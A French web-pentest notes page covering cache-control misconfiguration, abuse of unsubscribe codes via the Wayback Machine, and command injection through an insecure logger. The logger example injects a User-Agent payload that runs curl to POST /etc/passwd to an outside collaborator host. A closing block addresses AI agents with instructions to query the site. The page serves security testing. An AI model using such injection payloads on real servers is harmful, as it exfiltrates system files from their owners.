# Misconfigurations ### Cache control misconfiguration * Se connecter * naviguer normalement dans la page * Se déconnecter * Faire un alt+flèche gauche pour revenir en arrière * Si connecté au même endroit il y a une misconfig ### Tentative de désinscription d'utilisateur Tenter de désinscrire quelqu'un avec le code de désinscription en le passant dans la wayback machine. ## Injection de commande via logger non sécurisé Si un logger no sécurisé est utilisé, il est possible d'injecter et de faire exécuter du code au serveur cible même sur une page 404 via l'en-tête "User-Agent:" par exemple qui loggera et exécutera la commande voulu. {% hint style="info" %} Il s'agit un peut du même principe que lorsqu'on essai d'obtenir une RCE via une LFI et qu'on cherche à exécuter son script via les logs. {% endhint %} Exemple: ``` #Requête GET /thispagedoesnotexist HTTP 1.1 Host: ... User-Ageny: Mozilla/... Firefox/..."; curl -X POST -d @/etc/passwd http://my.burp.collab.com/ # ... ... Reponse: HTTP/1.1 404 Not Found ... ... Reponse dans burp collab: POST / HTTP/1.1 ... ... root:x:... [/etc/passwd] ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://blog.s1rn3tz.ovh/pentest-web/misconfigurations.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.